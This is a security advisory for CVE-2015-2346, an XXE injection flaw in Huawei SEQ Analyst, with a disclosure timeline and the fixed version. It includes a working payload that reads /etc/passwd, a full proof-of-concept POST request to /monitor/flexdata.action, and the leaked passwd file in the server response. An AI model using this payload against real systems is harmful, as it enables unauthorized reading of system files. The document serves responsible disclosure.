Huawei SEQ Analyst XXE Injection

`#Document Title:  
============  
Huawei SEQ Analyst - XML External Entity Injection (XXE)  
  
#Release Date:  
===========  
15 Apr 2015  
  
#CVE-ID:  
=======  
CVE-2015-2346  
  
#Product & Service Introduction:  
=======================  
SEQ Analyst is a platform for business quality monitoring and management by  
individual user and multiple vendors in a quasi-realtime and retraceable  
manner  
More Details & Manual ;  
http://download.huawei.com/download/filedownload.do?modelID=bulletin&refID=IN0000056669,101  
  
#Vulnerability Disclosure Timeline:  
========================  
3 Mar 2015 Bug reported to the vendor.  
6 Mar 2015 Vendor returned ; investigating  
16 Mar 2015 Asked about the case.  
16 Mar 2015 Vendor has validated the issue.  
17 Mar 2015 There aren't any fix the issue.  
18 Mar 2015 CVE number assigned  
15 Apr 2015 Fixed  
  
#Affected Product(s):  
===============  
Huawei Technologies Co. Ltd.  
Product: Huawei SEQ Analyst V200R002C03LG0001SPC100 (other versions may be  
vulnerable)  
  
#Exploitation Technique:  
=================  
Local, Authenticated  
  
#Technical Details:  
========================  
Target Path: /monitor/flexdata.action  
Sample Payload : <!DOCTYPE foo [<!ENTITY xxe00c70 SYSTEM  
"file:///etc/passwd"> ]>  
Affected Parameter: req  
  
#Proof of Concept (PoC):  
==================  
https://drive.google.com/file/d/0B-LWHbwdK3P9YnVvYXFFZWZKc0k/view?usp=sharing  
  
Request:  
  
POST /monitor/flexdata.action HTTP/1.1  
Host: ***:8443  
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:36.0) Gecko/20100101  
Firefox/36.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
DNT: 1  
Cookie: JSESSIONID=C07AC243148F4C6F7677E90C1085C2D3;  
org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=en_US;  
locale=en_US; locked=false;  
timeNum=1425365144829; timeState=true; loginUserName=testsms;  
CASTGC=TGT-549-  
skiUgOJowwMXhTwxQ4bH1iHB2XKWmKcJVLJYIlthZ56kqJ9yAZ-cas; lockScreen=false  
Connection: keep-alive  
Referer: https://  
***:8443/monitor/flexrelease/AllNetMonitor.swf/[[DYNAMIC]]/5  
Content-type: application/x-www-form-urlencoded  
Content-Length: 136  
  
req=<!DOCTYPE%20foo%20[<!ENTITY%20xxe00c70%20SYSTEM%20"file%3a%2f%2f%2fetc%2fpasswd">%20]><Req>%0a%20%20<c  
ommand>bizLicenseSetting%26xxe00c70%3b<%2fcommand>%0a<%2fReq>&rdm=Tue%20Mar%203%2008%3A45%3A50%20GMT%2B020  
0%202015  
  
Response:  
  
HTTP/1.1 200 OK  
Date: Tue, 03 Mar 2015 06:46:29 GMT  
Server: Apache-Coyote/1.1  
Cache- Control: no- cache, no-store  
Content-Type: text/html;charset=utf-8  
Content-Language: en-US  
Vary: Accept-Encoding  
Keep-Alive: timeout=5, max=100  
Connection: Keep-Alive  
Content-Length: 4281  
<html>  
<head>  
<style type="text/css">  
…  
<tr class="row_even">  
<td class="cell_object">1</td>  
<td class="cell_object">2〕Command is  
bizLicenseSettingnobody:x:65534:65533:nobody:/var/lib/nobody:/bin/false  
bin:x:1:1:bin:/bin:/bin/false  
daemon:x:2:2:Daemon:/sbin:/bin/false  
ftp:x:40:49:FTP account:/srv/ftp:/bin/false  
root:x:0:0:root:/root:/bin/bash  
messagebus:x:103:101:User for D-Bus:/var/run/dbus:/bin/false  
ntp:x:74:102:NTP daemon:/var/lib/ntp:/bin/false  
ftpsecure:x:104:65534:Secure FTP User:/var/lib/empty:/bin/false  
polkituser:x:105:103:PolicyKit:/var/run/PolicyKit:/bin/false  
haldaemon:x:106:104:User for haldaemon:/var/run/hald:/bin/false  
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false  
webserver:x:360:1800::/home/webserver:/bin/bash  
ecmftp:x:1000:1800::/opt/pub/software:/bin/bash  
ftptest:x:1001:1800::/opt/webserver/workspaces/ftp:/bin/bash  
httpd:x:361:1801::/home/httpd:/bin/bash  
cognos:x:1002:1802::/home/cognos:/bin/bash  
ftptrace:x:1003:1800::/opt/webserver/workspaces/ftp/traceserver:/bin/bash  
ftpsoc:x:1004:1800::/opt/pub/software:/bin/bash  
ftprtmu:x:1005:1800::/opt/webserver/workspaces/ftp/rtmu:/bin/bash</td>  
</tr>  
<tr class="row_odd">  
...  
  
#Solution Fix & Patch:  
================  
15 Apr 2015 Fixed version --> SEQ Analyst V200R002C03LG0001CP0022  
  
#Credits & Authors:  
==============  
Ugur Cihan Koc  
@_uceka_  
www.uceka.com  
  
  
`